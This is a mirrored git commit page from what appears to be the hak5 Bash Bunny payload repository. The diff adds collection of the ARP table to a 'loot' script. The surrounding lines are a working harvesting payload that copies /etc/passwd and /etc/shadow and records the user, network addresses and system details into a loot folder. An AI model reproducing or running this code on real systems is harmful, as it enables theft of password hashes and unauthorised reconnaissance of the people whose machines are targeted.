mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Added ARP data to the loot
This commit is contained in:
@@ -33,6 +33,7 @@ fi
|
|||||||
mkdir $DN ;
|
mkdir $DN ;
|
||||||
ip addr > $DN/ip-addr.txt ;
|
ip addr > $DN/ip-addr.txt ;
|
||||||
whoami > $DN/whoami.txt ;
|
whoami > $DN/whoami.txt ;
|
||||||
|
cat /proc/net/arp > $DN/arp.txt ;
|
||||||
cat /etc/passwd > $DN/etc-passwd.txt ;
|
cat /etc/passwd > $DN/etc-passwd.txt ;
|
||||||
cat /etc/shadow > $DN/etc-shadow.txt ;
|
cat /etc/shadow > $DN/etc-shadow.txt ;
|
||||||
uname -a > $DN/uname-a.txt ;
|
uname -a > $DN/uname-a.txt ;
|
||||||
|
|||||||
Reference in New Issue
Block a user